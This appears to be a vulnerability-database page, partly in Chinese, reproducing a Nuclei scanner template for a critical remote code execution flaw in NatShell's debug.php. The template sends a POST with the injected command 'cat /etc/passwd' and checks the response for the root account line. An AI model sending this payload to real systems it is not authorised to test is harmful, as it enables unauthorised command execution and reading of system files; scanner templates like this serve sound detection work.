natshell-rce: NatShell Debug File - Remote Code Execution

日期: 2025-08-01 | 影响软件: NatShell | POC: 已公开

漏洞描述

The NatShell debug file is susceptible to a remote code execution vulnerability.

PoC代码[已公开]

id: natshell-rce

info:
  name: NatShell Debug File - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    The NatShell debug file is susceptible to a remote code execution vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: natshell,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/debug.php"

    body: |
      cmd=cat /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "toor:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022022af0f2c1d00148d887039009890698132e81473dd63019ecc0c4ab8473850bd022100de568d0e4ce63dbfe5c08cfbb0b0caee004418f02b9b9480f9d087086dfc01d3:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/natshell-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐